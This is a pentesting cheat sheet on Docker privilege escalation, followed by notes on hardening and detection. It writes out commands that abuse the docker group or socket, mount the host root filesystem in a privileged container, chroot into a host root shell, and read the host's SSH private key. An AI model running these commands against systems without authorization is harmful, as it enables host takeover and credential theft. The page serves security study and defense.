14.-docker

Determine the installed Docker version.

docker version

View available Docker images.

docker image ls

Show all running and stopped Docker containers.

docker ps -a

Check if the user is part of the docker group, which may allow privilege escalation.

id

Check the default location of the Docker socket.

ls -l /var/run/docker.sock

Fetch the Docker binary in case it's missing.

wget <URL_TO_DOCKER_BINARY> -O docker
chmod +x docker

Use the Docker socket to list running containers.

./docker -H unix:///var/run/docker.sock ps

Start a privileged container and mount the host’s root filesystem.

./docker -H unix:///var/run/docker.sock run --rm -d --privileged -v /:/hostsystem <image_name>

Gain shell access inside the privileged container.

./docker -H unix:///var/run/docker.sock exec -it <container_id> /bin/bash

View sensitive host files inside the container.

cat /hostsystem/root/.ssh/id_rsa

Use chroot to access the host system from inside a container.

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

Ensure that the Docker socket has the appropriate permissions.

ls -l /var/run/docker.sock

View running containers using Docker Compose.

docker-compose ps -a

Access a shell within a running container using Docker Compose.

docker-compose exec <container_name> /bin/bash

Inspect service configurations in Docker Compose.

docker-compose config --services <service_name>

Docker Architecture:
- Docker Daemon (server): Manages containers, images, networks, and storage.
- Docker Client: Interface for interacting with the Daemon.
- Docker Compose: Orchestrates multi-container applications.
- Docker Desktop: GUI for managing Docker.
Docker Images and Containers:
- Images: Read-only templates.
- Containers: Mutable instances of images.
Privilege Escalation Vectors:
- Shared Directories (Volume Mounts): Accessing sensitive host files.
- Docker Sockets: Abusing the Docker daemon socket for control.
- Docker Group: Membership grants control over the Docker daemon.
- Writable Docker Sockets: Abusing writable docker sockets when the user is not in the docker group.

Shared Directories:
- Locating mounted host directories within the container.
- Accessing sensitive files (e.g., SSH private keys).
Docker Sockets:
- Locating the docker.sock file.
- Using the docker binary (or downloading it) to interact with the socket.
- Running privileged containers with host root mounts.
- Using docker run with a chroot into the host system.
Docker Group:
- Checking user group membership (id).
- Exploiting the ability to run arbitrary Docker commands.
Writable Docker Sockets:
- Checking permissions on the docker.sock file.
- Executing commands through the docker socket to gain root on the host.

Security Best Practices:
- Minimize volume mounts.
- Use read-only mounts when possible.
- Restrict access to the Docker socket.
- Avoid running containers with --privileged.
- Implement proper user and group management.
- Use security scanning tools for docker images.
- Use docker rootless mode.
Attack Vectors:
- Exploiting vulnerabilities in the Docker daemon itself.
- Compromised Docker images.
- Misconfigured Docker Compose files.
Detection:
- Monitor Docker socket activity.
- Audit Docker configurations.
- Use intrusion detection systems.
Containerization Security:
- Understanding Docker security is crucial for modern infrastructure.
- Tools like Docker Bench for Security and Clair can help assess security.
Namespaces and Cgroups: Reinforce the importance of namespaces and cgroups in docker security.
Real World Examples: Researching real world docker escapes will help solidify understanding of the attack vectors.
Rootless Docker: Modern docker installations can run in rootless mode, which greately reduces the attack surface.
Docker Capabilities: Docker utilizes linux capabilities, and those can be missused.

Last updated 5 months ago